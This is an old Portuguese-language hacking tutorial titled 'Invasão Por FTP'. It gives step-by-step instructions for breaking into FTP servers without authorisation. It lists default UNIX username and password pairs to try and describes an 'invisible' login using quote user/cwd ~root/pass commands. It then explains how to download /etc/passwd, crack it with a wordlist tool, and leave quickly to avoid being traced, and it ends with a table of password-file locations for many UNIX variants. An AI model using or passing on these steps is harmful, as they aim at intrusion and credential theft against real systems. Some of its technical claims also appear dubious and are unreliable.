Invasão Por FTP
O primeiro passo é desobrir o endereço
do Host ou seu IP. Para isso,
normalmente usamos o IP Scan
ou outro programa de IP. Existem
vários específicos programas
de FTPs, até o próprio Windows
tem um deles. Para checar um
deles, vá ao MS-DOS e digite
FTP. Ao aparecer o ftp>,
digite OPEN. Vai abrir um outro
Prompt (to), digite o nome do
host ou seu IP. Ao conectar,
ele pedirá o login e o password.
Para teste, tente usar os passwords
UNIX (quadro abaixo). Quando
eles tem problemas no acesso,
normalmente a solução adotada
é entrar INVISIVEL.
Passwords do UNIX |
LOGIN |
PASSWORD |
|
LOGIN |
PASSWORD |
root |
root |
|
sysadmin |
sysadmin |
root |
system |
|
sysadmin |
sys |
sys |
sys |
|
sysadmin |
system |
sys |
system |
|
sysadmin |
admin |
daemon |
daemon |
|
sysadmin |
adm |
uucp |
uucp |
|
who |
who |
tty |
tty |
|
learn |
learn |
test |
test |
|
uuhost |
uuhost |
unix |
unix |
|
guest |
guest |
unix |
test |
|
host |
host |
bin |
bin |
|
nuucp |
nuucp |
adm |
admin |
|
games |
games |
adm |
adm |
|
rje |
rje |
admin |
adm |
|
games |
player |
admin |
admin |
|
sysop |
sysop |
sysman |
sysman |
|
root |
sysnop |
sysman |
sys |
|
demo |
demo |
sysman |
system |
|
------------- |
------------ |
Para
entrar invisivel: No login, basta pressionar "enter",
no password, "enter" novamente...
Vai aparecer o prompt ftp>,
ai você digita: quote user ftp,
Pressione "enter"e digite: quote
cwd ~root, mais um enter novamente:
quote pass ftp.
Muito
fácil hackear de forma invisivel...
Mas tem um porém..., se ao acessar,
aparecer a mensagem: user restriction
aplly, o pretenso hacker não
está hackeando, pois está sendo
aplicada uma proteção. Neste
casso, você tentará o outro
user.
Tipo: quote cwd~sys e
outros da lista UNIX.
O
hacker normalmente não tenta
hackear usando o user normal
de FTPs, que é o login: anonymous
e password: seu e-mail, pois
neste caso é aplicada a proteção.
Ao entrar, ele estará no diretório
do login, como \\home\\root\\,
por exemplo.
Depois
disso, ele entra no diretório
/etc (cd, etc) e pega o arquivo
password (get passwd), que contém
as senhas dos usuários. Apesar
delas poderem estar criptografadas,
existem programas, como o Jack,
que consegue descriptografar
através do método de comparação.
O Jack pega uma WordList, a
criptografica com as instruções
do passwd e compara os resultados
gravados em um arquivo. O arquivo
de senhas pode estar em vários
diretórios (vide tabela abaixo)
dependendo do UNIX. Normalmente
ele não fica mais de 5 minutos
no servidor, pois terá seu IP
e login caçados após este tempo.
Vale ressaltar que o que
você fizer com as instruções
deste texto, não me responsabilizo!
Cuidado hackeando FTP por ai,
se pegarem...... Neste caso,
terá que arcar com as consequencias,
por isso não tente ficar mais
de 5 mim dentro de um ftp, senão
eles te pegam!
Arquivos de Senhas |
UNIX |
Diretório |
AIX
3 |
/etc/security/passwd/auth/files// |
A/UX
3.Os |
/tcb/files/auth/? |
BSD4.3-Reno |
/etc/master.passwd |
ConvexOS
10 |
/etc/shadpw |
ConvexOS
11 |
/etc/shadow |
DG/UX |
/etc/tcb/aa/user |
EP/IX |
/etc/shadow |
HP-UX |
/.secure/etc/passwd |
IRIX
5 |
/etc/shadow |
Linux
1.1 |
/etc/shadow |
OSF/1 |
/etc/passwd[.dir
| .pag] |
SCO
Unix #.2.x |
/tcb/auth/files/ |
SunOS
4.1 + c2 |
/etc/security/passwd.adjunct |
SunOS
5.0 |
/etc/shadow |
System
V 4.0 |
/etc/shadow |
System
V 4.2 |
/etc/security/database |
Ultrix
4 |
/etc/auth[.dir
| .pag] |
UNICOS |
/etc/udb |
|